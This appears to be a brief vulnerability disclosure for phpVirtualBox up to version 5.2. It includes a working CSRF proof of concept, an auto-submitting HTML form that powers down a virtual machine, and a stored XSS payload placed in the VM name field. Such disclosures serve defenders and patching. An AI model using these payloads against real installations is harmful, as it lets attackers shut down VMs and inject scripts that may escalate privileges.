# Title: phpVirtualBox / CSRF - Stored XSS
# Date: 03/04/2018
# Discovered by: @codexlynx
# Software Version: <= 5.2
# Category: php, web, csrf, xss

[1 # Title: phpVirtualBox / CSRF - Stored XSS
# Date: 03/04/2018
# Discovered by: @codexlynx
# Software Version: <= 5.2
# Category: php, web, csrf, xss

[1]CSRF
--------------------------------
The backend doesn't validate the origin of the actions.

- POC: Shutdown a VM

<body onload="document.csrf.submit();">
<form method="post" action="<TARGET>/<PHPVB_PATH>/lib/ajax.php" name="csrf">
<input type="hidden" name="vm" value="<VM_ID>" />
<input type="hidden" name="state" value="powerDown" />
<input type="hidden" name="fn" value="machineSetState" />
</form>
</body>

[2]Stored XSS
--------------------------------
Many fields don't sanitize inputs. This vulnerability could allow a user role escalation in the application.

- POC: Insert a persistent script in the vm name field.

New (Create Virtual Machine) -> Name: <script>alert(1);</script>Test